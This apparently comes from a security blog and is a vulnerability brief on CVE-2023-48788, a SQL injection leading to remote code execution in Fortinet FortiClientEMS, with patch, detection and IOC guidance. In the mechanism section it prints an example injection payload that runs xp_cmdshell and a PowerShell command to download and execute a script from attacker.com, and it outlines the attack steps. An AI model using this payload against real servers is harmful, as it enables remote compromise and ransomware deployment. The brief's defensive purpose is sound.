CVE-2023-48788 Critical Patch Available

CVE-2023-48788: Fortinet FortiClientEMS — SQL Injection to RCE

Vuln Brief Research Team · · CVSS 9.8

CVE Details

CVE ID CVE-2023-48788
CVSS Score 9.8
Severity Critical
Vendor Fortinet
Product FortiClientEMS
Patch Status Available
Published March 3, 2026

Background

Fortinet FortiClientEMS (Endpoint Management Server) is the centralised management server for Fortinet’s FortiClient endpoint security software. Organisations use FortiClientEMS to deploy, configure, and monitor FortiClient agents on endpoint devices across their network. EMS servers typically have access to all managed endpoints and can push configuration changes, software updates, and policies to those endpoints — making them high-value targets for lateral movement and widespread access.

CVE-2023-48788 is a CVSS 9.8 SQL injection vulnerability in FortiClientEMS, disclosed in March 2024. Unlike many SQL injection vulnerabilities that are limited to data extraction, this vulnerability enables code execution through SQL Server’s extended stored procedures, specifically xp_cmdshell. CISA confirmed active exploitation after multiple ransomware groups incorporated the vulnerability into their attack chains.

Technical Mechanism

CVE-2023-48788 is a SQL injection in the FortiClientEMS server’s DAS (Database Access Server) component. FortiClientEMS runs on Windows Server and uses Microsoft SQL Server as its backend database.

The vulnerable component processes data from FortiClient agents connecting to the EMS server. Specifically, certain fields in the agent registration or heartbeat communication are passed to SQL queries without adequate parameterisation:

-- Vulnerable query (conceptual representation)
SELECT * FROM endpoints WHERE hostname = '<agent_supplied_hostname>'

-- Malicious agent data:
-- hostname = '; EXEC xp_cmdshell 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(''http://attacker.com/shell.ps1'')"'--

-- Resulting query:
SELECT * FROM endpoints WHERE hostname = '';
EXEC xp_cmdshell 'powershell -c "IEX(...)"; --'

xp_cmdshell is a SQL Server extended stored procedure that executes Windows shell commands. When enabled (or when the attacker can enable it via sp_configure), SQL injection with stacked queries allows direct OS command execution.

The attack path:

  1. Discover EMS server: FortiClientEMS typically runs on port 8013 (TCP) and has a web management UI
  2. Craft malicious request: Send a request mimicking a FortiClient agent registration/heartbeat with SQL injection payload in the hostname or other fields
  3. Enable xp_cmdshell if needed: If disabled, use sp_configure 'xp_cmdshell', 1; RECONFIGURE within the injection
  4. Execute commands: Use EXEC xp_cmdshell to run PowerShell or CMD commands in the context of the SQL Server service account
  5. Escalate: SQL Server often runs as NETWORK SERVICE or LOCAL SYSTEM; use privilege escalation techniques for full SYSTEM access if needed

The EMS server also has access to the FortiClient management API, allowing an attacker with EMS control to push malicious configurations or software to all managed endpoints.

Real-World Exploitation Evidence

Horizon3.ai and other security firms published detailed technical analyses confirming that CVE-2023-48788 is straightforwardly exploitable. In-the-wild exploitation was confirmed:

  • Ransomware campaigns: Multiple ransomware operators used CVE-2023-48788 for initial access, particularly targeting organisations in manufacturing, healthcare, and professional services that heavily use FortiClient endpoint security.
  • Exploitation within days of advisory: Working PoC exploits were published within days of the March 2024 advisory, leading to rapid uptake by criminal threat actors.
  • EMS as pivot point: Post-exploitation, attackers used EMS’s management capabilities to deploy additional malware to all endpoints managed by the compromised EMS server — a highly efficient lateral movement technique.
  • Credential harvesting: FortiClientEMS databases contain endpoint inventory data, user-device mappings, and potentially credential information used for EMS-endpoint authentication.

Impact Assessment

The cascading impact from an EMS server compromise is significant:

  • Command execution on EMS host: SQL Server code execution provides Windows OS command execution on the EMS server.
  • All-endpoint access: EMS has management authority over all FortiClient-managed endpoints; attackers can leverage EMS to push malicious scripts or configurations to every managed endpoint.
  • Endpoint security blind spot: An attacker controlling EMS can modify FortiClient configurations to disable endpoint security features, exclude directories from scanning, or uninstall FortiClient entirely.
  • VPN credential access: FortiClientEMS manages VPN configurations; stored pre-shared keys and credentials may be accessible.

Affected Versions

ProductAffected VersionsFixed Version
FortiClientEMS 7.27.2.0 – 7.2.27.2.3+
FortiClientEMS 7.07.0.1 – 7.0.107.0.11+
FortiClientEMS 6.4AllNo fix (EOL — migrate to 7.x)

Remediation Steps

  1. Apply patches: Upgrade FortiClientEMS to the fixed versions. The update is available from the Fortinet Customer Support portal.

  2. Restrict network access to EMS: The EMS management server should not be internet-facing. Confirm that:

    • Port 8013 (EMS management) is not accessible from the internet
    • Access is limited to internal management networks

  3. Review SQL Server configuration:

    -- Check xp_cmdshell status
SELECT value FROM sys.configurations WHERE name = 'xp_cmdshell';

-- Check for unexpected SQL Server logins
SELECT name, type_desc, is_disabled FROM sys.server_principals
WHERE type IN ('S', 'U') ORDER BY create_date DESC;

  4. Check for IOCs on the EMS host:

    • Review Windows Event Logs for unusual process creation events (Event ID 4688)
    • Check for PowerShell execution history: Get-PSReadlineOption | Select HistorySavePath
    • Audit EMS database for unexpected entries in endpoint tables

  5. Run endpoint audit: If EMS compromise is confirmed, audit all managed FortiClient endpoints for unauthorised configuration changes or malware deployment.

Detection Guidance

Log sources:

  • Windows Event Logs (Security, System, Application) on the EMS server
  • SQL Server error logs: C:\Program Files\Microsoft SQL Server\MSSQL[version]\MSSQL\Log\ERRORLOG
  • FortiClientEMS application logs: C:\Program Files\Fortinet\FortiClientEMS\logs\

SQL Server suspicious activity:

-- Check for xp_cmdshell usage
SELECT TOP 100 * FROM sys.dm_exec_query_stats
CROSS APPLY sys.dm_exec_sql_text(sql_handle)
WHERE text LIKE '%xp_cmdshell%'
ORDER BY last_execution_time DESC;

Windows Event Log signatures:

  • Event ID 4688 (Process Creation): sqlservr.exe spawning cmd.exe or powershell.exe
  • Event ID 7045 (Service Installation): New services installed around time of exploitation

Suricata signature:

alert tcp $EXTERNAL_NET any -> $HOME_NET 8013 (msg:"Fortinet FortiClientEMS CVE-2023-48788 SQL Injection Probe"; flow:established,to_server; content:"xp_cmdshell"; nocase; sid:9002348; rev:1;)

Timeline

DateEvent
March 12, 2024Fortinet publishes advisory; patches released
March 12, 2024CISA adds CVE-2023-48788 to KEV catalogue
March 14, 2024Horizon3.ai publishes technical analysis and PoC
March 2024Exploitation by multiple threat actors confirmed
April 2024Ransomware campaigns using CVE-2023-48788 documented

Tags

fortinetforticlientemssql-injectionrceendpoint-managementcisa-kev

Related Analysis

CVE-2024-1708 Critical

CVE-2024-1708: ConnectWise ScreenConnect Path Traversal — RMM Tools as Attack Vectors

ConnectWise

CVE-2026-0300 Critical

CVE-2026-0300: Palo Alto PAN-OS Out-of-Bounds Write Leads to Root RCE on Firewalls

Palo Alto Networks

CVE-2026-20182 Critical

CVE-2026-20182: Cisco Catalyst SD-WAN Authentication Bypass — Unauthenticated Admin Access

Cisco